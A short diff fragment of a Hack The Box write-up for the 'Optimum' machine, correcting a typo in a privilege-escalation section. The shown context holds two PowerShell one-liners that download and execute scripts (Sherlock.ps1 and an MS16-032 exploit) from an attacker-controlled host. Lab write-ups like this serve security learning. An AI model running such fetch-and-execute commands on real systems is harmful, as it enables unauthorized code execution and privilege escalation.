Kyuu-Ji/htb-write-up/optimum/write-up-optimum.md

 IEX(New-Object Net.WebClient).downloadString('http://10.10.14.23:8000/Sherlock.ps1')
 ```

-It appears to be vulnerable against **MS016-032 - Secondary Logon Handle** which we will with the script _Invoke-MS16032.ps1_.
+It appears to be vulnerable against **MS016-032 - Secondary Logon Handle** which we will exploit with the script _Invoke-MS16032.ps1_.
 ```markdown
 IEX(New-Object Net.WebClient).downloadString('http://10.10.14.23:8000/Invoke-MS16032.ps1')
 ```